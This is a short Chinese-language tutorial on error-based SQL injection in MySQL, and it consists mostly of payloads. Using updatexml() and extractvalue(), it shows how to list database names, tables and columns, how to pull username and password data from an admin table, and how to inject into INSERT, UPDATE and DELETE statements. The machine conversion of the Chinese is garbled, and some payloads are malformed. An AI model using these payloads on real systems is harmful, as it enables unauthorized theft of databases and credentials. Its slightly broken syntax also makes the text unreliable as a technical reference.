SQL注入之報錯注入

0x01 報錯注入

在實際場景中，沒有乙個資料的返回資訊點。此時需要用報錯注入使其顯示出注入資訊。

使用到報錯注入的場景有：

普通報錯注入，即沒有資料返回點

insert注入

update注入

delete注入

0x02 常用到的兩個報錯函式

updatexml（）和extractvalue()函式

0x03 updatexml函式

updatexml( (xml_document, xpath_string, new_value);

第乙個引數：xml_document是string格式，為xml文件物件的名稱，文中為doc

第二個引數：xpath_string (xpath格式的字串)

第三個引數：new_value，string格式，替換查詢到的符合條件的資料

修改 xpath_string的格式，讓其報錯

updatexml(1,concat(0x7e,(sql_inject的語句)),1)

0x7e是16進製制，相當於~

1.爆資料庫

updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select schema_name),0x7e) from information_schema.schemata limit 0,1),0x7e),1)

2.爆表

updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select table_name),0x7e) from information_schema.tables limit 0,1),0x7e),1)

3.爆欄位

updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select column_name),0x7e) from information_schema.columns limit 0,1),0x7e),1)

4.爆資料

updatexml(1,concat(0x7e,(select distinct concat(0x7e, username,password) from jw_admin limit 0,1),0x7e),1)

0x04 extractvalue函式

extractvalue函式的使用方法和updatexml一樣

報資料當前資料庫

extractvalue(,concat(0x7e,(select database()),0x7e))

在資料庫當中.號代表著下一級。

只需要將updatexml更改為extractvalue

0x05 其他

在insert、update、delect注入中,注意閉合

or updatexml(1,(sql_inject語句)1) or

or extractvalue(1,(sql_inject語句)1) or

insert注入：insert into users (id, username, password) values (2,『pseudo_z』 or updatexml(1,concat(0x7e,(database())),0) or』』, 『security-eng』);

update注入：update users set password=『security-eng』 or updatexml(2,concat(0x7e,(database())),0) or』』 where id=2 and username=『pseudo_z』;

delete注入：delete from users where id=2 or updatexml(1,concat(0x7e,(database())),0) or』』;